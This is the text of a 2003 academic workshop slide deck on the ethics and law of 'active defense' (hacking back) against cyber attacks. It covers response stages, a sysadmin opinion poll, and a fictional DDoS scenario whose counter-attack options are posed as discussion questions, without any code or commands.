Embed Size (px)
Citation preview
Active Defenses to Cyber Attacks
Active Defenses to Cyber Attacks
UW Information School/Agora Workshop09/12/03
Supported by a research grant from Cisco Systems Critical Infrastructure Assurance Group
AgendaAgenda
• Three floating moderators
• “Three hour tour” format• Background (~45 minutes)• Open discussion of issues (~1 hour)• Attack Scenario (~20 minutes)• 9 potential AD actions (~2 hours)
• ~10-15 minutes each
Desired outcomeDesired outcome
• Get feedback on current outline of Active Defense
• Get ideas on pros/cons of AD actions
• Identify avenues of legal/ethical/technical research
• Identify alternatives and possible changes in laws, public/private CompSec policies
• Have a fun time!
BackgroundBackground
• Topic discussed in Pre-Agora meeting June 8, 2001 and again in Q1 2003• Current USG interest• Ongoing private sector interest• Lack of common definitions• Potential impact on national & international
debate
Senate debateSenate debate
"If we can find some way to do this without destroying their machines, we'd be interested in hearing about that. If that's the only way, then I'm all for destroying their machines. If you have a few hundred thousand of those, I think people would realize [the seriousness of their actions.] There's no excuse for anyone violating copyright laws.”
Utah Senator Orrin Hatch
Information AssuranceInformation Assurance
• Information Assurance (IA) concerns information operations that protect and defend information and information systems by ensuring availability, integrity, authentication, confidentiality, and non-repudiation.
• This includes providing for restoration of information systems by incorporating protection, detection, and reaction capabilities. Source: National Security Telecommunications and Information Systems Security Instruction (NSTISSI) No. 4009, January 1999
Attacks (Strategic level)Attacks (Strategic level)
• Denial of Service
• Theft/alteration of data• Web page defacement• Industrial espionage
• Theft of services/resources• “Stepping stones”/anonymity• Caching data/malware
• Violation of copyright (“warez”)
Attacks (Tactical level)Attacks (Tactical level)
• Remote service exploitation• Log alteration/"rootkits"• Sniffers• Covert channel comms• Stepping stones• Encryption• Address forgery/hijacking• Distributed attacks• Reflected attacks
Attack Specifics (example)Attack Specifics (example)
Denial of Service• Resource consumption
• HostProcessorMemoryNetwork services
• NetworkBandwidthRouter Resources (see Host above)
• Crashing• Redirection
You are here…You are here…
Defenses (Strategic level)Defenses (Strategic level)
• Firewalls
• IDS
• Logging/monitoring• Host (e.g., accounts, processes, services)• Network (flows, connections, data)
• Honeypots/Honeynets• Augment FW/IDS• Deception
Defenses (Tactical level)Defenses (Tactical level)
• Topological/Access control changes• Sniffing/keystroke logging• Scanning• Traffic redirection• Traffic analysis• Honeypots/Honeynets• Remote exploitation• Denial of Service
Big loss over timeBig loss over time
0
100
200
300
400
500
600
700
800
1st hour 2nd hour 3rd hour 4th hour
Losses (*$1000)
Warbucks’ lost commissions on stock trades
Small loss over timeSmall loss over time
0
50
100
150
200
250
Day 1 Day 2 Day 3 Day 4
Losses (* $1)
Individual selling used books on Amazon
Stages of ResponseStages of Response
• 0 - Unconscious
• 1 - Involved
• 2 - Interactive
• 3 - Cooperative Response
• 4 - Non-cooperative (AD) Response
“Unconscious”“Unconscious”
• Stage 0: “Right out-of-the-box”• “The firm/system owner/operator takes no active
role, either directly or through proxy, to modify, improve, enhance, or alter defensive capabilities inherent in the hardware, firmware, and/or software as delivered from the manufacturer or installer.”
“Involved”“Involved”
• Stage 1: “Doing Business”• “The firm/system owner/operator establishes
(either directly or via proxy) a baseline, tailored, day-to-day defensive posture involving only resources directly owned or operated by that owner/operator. The posture is maintained / kept current.”
“Interactive”“Interactive”
• Stage 2: “We’ve Got a Problem”• “The firm/system owner/operator applies
measures, in response to warning or evidence of malfeasance, to resources directly owned or operated by them. The measures are beyond the baseline because they cause some loss of flexibility, capability, or ease of use and the owner/operator does not want/intend them to become routine business practice.”
“Cooperative Response”“Cooperative Response”
• Stage 3: “Reach out …”• “The firm/system owner/operator engages other
organizations/firms/systems to take measures intended to attribute, mitigate, or eliminate the threat through cooperative efforts beyond the ability of the owner/operator to effect but within the lawful authority of the cooperating other party or parties.”
“Non-cooperative Response”“Non-cooperative Response”
• Stage 4: “... and Touch Someone.”• “The firm/system owner/operator takes measures,
with or without cooperative support from other parties, to attribute, mitigate, or eliminate the threat by acting against an uncooperative perpetrator or against an organization/firm/system that could (if cooperative) attribute, mitigate, or eliminate the threat.”
Active DefenseActive Defense
• Agora workshop on June 8, 2001 defined “Active Defense” to be activity at Stage 4
• Stage 4 has levels, though• Less intrusive to more intrusive• Less risky to more risky• Less disruptive to more disruptive
• Justification for and defense of your actions may depend on how well you progress through all 4 stages
Levels of Active DefenseLevels of Active Defense
• 4.1 - Non-cooperative ‘intelligence’ collection• External services (finger, netstat, nbtstat)• Back doors/remote exploit to access internal
services
• 4.2 - Non-cooperative ‘cease & desist’
• 4.3 - Retribution or counter-strike
• 4.4 - Preemptive defense
What Do We Need to Know?What Do We Need to Know?
• Are your losses and the potential risk to you at least equal to the benefit gained if you are successful?
• Who is it? Or “Attribution; the $64,000 question.”
• What are you contemplating doing?
• What effect do you intend to achieve?
• What ‘blow back’ could occur?
What Do We Need to Know?What Do We Need to Know?
• What are your personal and organizational risks?
• Who can help?
• Who are you going to call if you do this?
• Who/what is the target? How do you know?
• Who defines what active defense is for you?
• Was there another way? Or “Creative Response versus Active Defense”
Best Practice is to Think AheadBest Practice is to Think Ahead
• Risk Mitigation Strategy: Early, early, early• Pre-arranged ‘moves’ with your ISP• Business interruption insurance• Before-the-fact discussions with the Law• Pre-arranged responses within • Time things out• Range of response options for the CEO• Who provides the oversight of this decision?
Other PointsOther Points
• If this hurts your head, be glad you’re not in Congress
• Dark Noise: It’s there and it’s useful• People with the power of nation states• Roles of government
• Can it provide recourse?
• Can it ever get fast enough?
• Agora as mentor
Unintended consequencesUnintended consequences
• Xerox PARC, 1978
• Researchers use worms to automate tasks on Alto network
• Innocuous code corrupted
• >200 systems crash, reboot, crash…
• Morris worm in 1988 also buggy
• Even Nachi isn’t perfect
Oudot’s reaction to BlasterOudot’s reaction to Blaster
• Used “honeyd” to pretend to be vulnerable Windows box
• Opened fake worm port (4444/tcp)
• Captured worm payload using tftp
• Provided prototype cleanup code (that worked!)
SysAdmins at UW polled: 76 respondents
#1 - Do you think it is ethical to take active defense measures like these in a random way (i.e., a worm) like nachi?
YES1%
YES, W/ EXPLANATION3%
NO, W/ EXPLANATION11%
DON'T KNOW1%
EQUI-VOCAL4%
NO80%
YES YES, W/ EXPLANATION NO NO, W/ EXPLANATION DON'T KNOW EQUI-VOCAL
#2 - Do you think it is ethical to do this in a random way against systems within a network your organization owns (e.g., a corporate network, a university network)?
YES8%
YES, W/ EXPLANATION20%
NO46%
NO, W/ EXPLANATION9%
DON'T KNOW1%
EQUI-VOCAL16%
YES YES, W/ EXPLANATION NO NO, W/ EXPLANATION DON'T KNOW EQUI-VOCAL
#3 - Do you think it is ethical to do this in a targeted way (like outdot did) against systems within a network your organization owns?
YES21%
YES, W/ EXPLANATION20%
NO22%
NO, W/ EXPLANATION4%
DON'T KNOW1%
EQUI-VOCAL32%
YES YES, W/ EXPLANATION NO NO, W/ EXPLANATION DON'T KNOW EQUI-VOCAL
#4 - Do you think it is always unethical to alter files in any system you yourself do not own?
YES40%
YES, W/ EXPLANATION17%
NO14%
NO, W/ EXPLANATION10%
DON'T KNOW0%
EQUI-VOCAL19%
YES YES, W/ EXPLANATION NO NO, W/ EXPLANATION DON'T KNOW EQUI-VOCAL
Open DiscussionOpen Discussion
Attack ScenarioAttack Scenario
• Players• Warbucks Financial Services• Target Medical Center at the University of
Hard Knocks• Francis X. Hackerman• C_prime
Warbucks Financial ServicesWarbucks Financial Services
• Boutique stock services for high $$$ clients
• Real-time quotes from their web site
• CRM system used in-house
• Voice over IP comms
• Laptops for ul/dl data and email
• All systems tightly integrated for speed, flexibility, customized service
Hard Knocks UHard Knocks U
• Large State U w/four campuses• Combined Academic/Clinical Med Center
(Target Medical Center)• TMC has Computerized Physician Order
Entry (CPOE) system connected to Electronic Medical Record (EMR) system
• TMC used as DDoS agents• HKU used as stepping stone, cache and
DDoS handler (on different campuses)
Francis X. HackermanFrancis X. Hackerman
• CISO of Warbucks
• Recent graduate of HKU School of Information Management
• Was notorious hacker in High School
• Considers himself a highly skilled “hired gun” when it comes to computer networks
C_primeC_prime
• Security Engineer at Hard Knocks University
• Senior member of incident response team
• Represents HKU on Higher Ed ISAC
• Her background includes mathematics, programming, system administration
AttackAttack
• Attacker owns 2000-3000 hosts world-wide (stepping stones, DDoS agents)
• Attacker choses to take out all services at Warbucks via massive rolling DDoS attack (100-300 hosts at a time)
• Warbucks’ network is inoperative - difficulty tracing attack sources, but notes some at TMC, HKU, many other .edus, etc.
• HKU IRT was already investigating intrusions to hosts on their net (have isolated malware)
• Possible consequence of a disruptive AD action towards TMC’s network is death of a patient
ResponseResponse
• Hackerman and C_prime both go through Stages 1 to 3
• DDoS traffic cannot be entirely blocked by their upstream network provider
• DDoS network too large/dynamic to contact all sites involved
• Explore options at Stage 4…
Action AAction A
• C_prime finds a sniffer log on a compromised TMC system. This log exposes an account and password on a host in Canada (used as a cache and stepping stone by the attacker). She has the ability to enter the Canadian system with root privilege, and could periodically run operating system commands to monitor use and/or copy files off the system.
Action BAction B
• Using this same password, she could also shut this host down temporarily or semi-permanently, requiring administrator intervention. This could disable some/all of the DDoS network (can’t be sure…)
• Consequence: Host goes down
Action CAction C
• C_prime identifies means of controlling (even disabling) DDoS agents on other hosts. This knowledge could be used to shut down just the DDoS agents on all affected hosts at once during a DDoS attack.
• Consequence: DDoS agents stopped
Action DAction D
• Hackerman scans the entire network at TMC, identifying all nodes (IP address, operating system type, all services enabled, versions of services.) Sends results to TMC network contact. Gets no reply.
Action EAction E
• Hackerman’s scan finds a router vulnerable to a one or more remote DoS attacks. Has the option of using exploits to disable this router.
• Consquence: Outage would affect all hosts on TMC’s network that share this router. (Possible result: Patient dies)
Action FAction F
• Hackerman scans just the identified DDoS agents at HKU & TMC (identifying operating system type, all services enabled, versions of services). Finds they are vulnerable to a remote exploit. Could use this means to enter and disable network access to these hosts.• Similar to what RIAA/MPAA were proposing for
copyright violators
• Consequence: Host losses network access (Similar to E)
Action GAction G
• Hackerman’s scan shows a large number of Windows desktops vulnerable to various DCOM flaws. Could modify publicly available exploits/worms to affect only systems on the HKU, TMC networks, shutting them down.
• Consequence: Many hosts go down (Similar to E)
Action HAction H
• Another alternative for Hackerman could be to use DCOM exploits to take over control of one or more systems on TMC’s network, using them to sniff traffic of the intruder as stepping stones are used. This could identify the intruder, or at least get one hop closer…
• Consequence: None?
Action IAction I
• Hackerman is contacted by C_prime, who knows Warbucks is victim of massive DDoS. Provides Hackerman with information about suspected DDoS handlers, perhaps even attacker’s other stepping stones. Hackerman could attack these sites to try to pre-empt another round of attacks on Warbucks’ network.
• Consequence: ???
Action JAction J
Action KAction K
Action LAction L
